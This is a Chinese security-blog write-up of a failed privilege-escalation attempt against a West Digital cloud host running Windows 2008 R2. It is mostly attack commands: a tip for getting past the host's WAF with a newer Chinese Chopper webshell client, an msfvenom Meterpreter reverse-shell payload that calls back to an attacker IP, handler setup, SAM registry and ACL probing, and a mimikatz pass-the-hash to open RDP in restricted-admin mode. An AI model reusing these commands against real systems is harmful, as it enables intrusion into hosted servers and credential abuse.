所有话题标签: |
0x01 前言
这个案例仍然是帮一个朋友看的,说是一台西部数码云主机,他在提权过程中遇到了一些无法解决的问题,所以想让我帮着给看下。
0x02 信息搜集
系统型号: west_yun(西部数码云主机)
目标系统:Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
当前权限:ebs-33***xag***
开放端口:21、80、135、3306、65132(TermService)
进程名称:mysqld.exe、建站助手V4.0.exe
net.exe、net1.exe、netstat.exe、tasklist.exe、taskkill.exe、sc.exe、reg.exe......
0x03 实战提权过程
西部数码云主机都会有云WAF安全保护,比如我们在使用低版本中国菜刀连接这个ASP的Webshell时就会出现下图拦截提示,只需更换为中国菜刀2016版即可成功绕过。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=3*.9*.9.2*8 lport=443 -f exe > /tmp/64.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.16.9.200
set lport 443
exploit
d:wwwroot***lzswwwroot> reg query HKLMSAMSAM
PS > Get-Acl -Path HKLM:SAMSAM | Format-List
PS > Get-Acl -Path c:windowssystem32net.exe | Format-List
PS > Get-Acl -Path c:windowssystem32cmd.exe | Format-List
C:UsersAdministrator>winmgmt /resetrepository
WMI 存储库已重置
privilege::debug
sekurlsa::pth /user:administrator /domain:. /ntlm:547df6e0f6aa5f*********510cdacf "/run:mstsc.exe /restrictedadmin"
本文始发于微信公众号(贝塔安全实验室):西部数码云主机失败提权案例
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论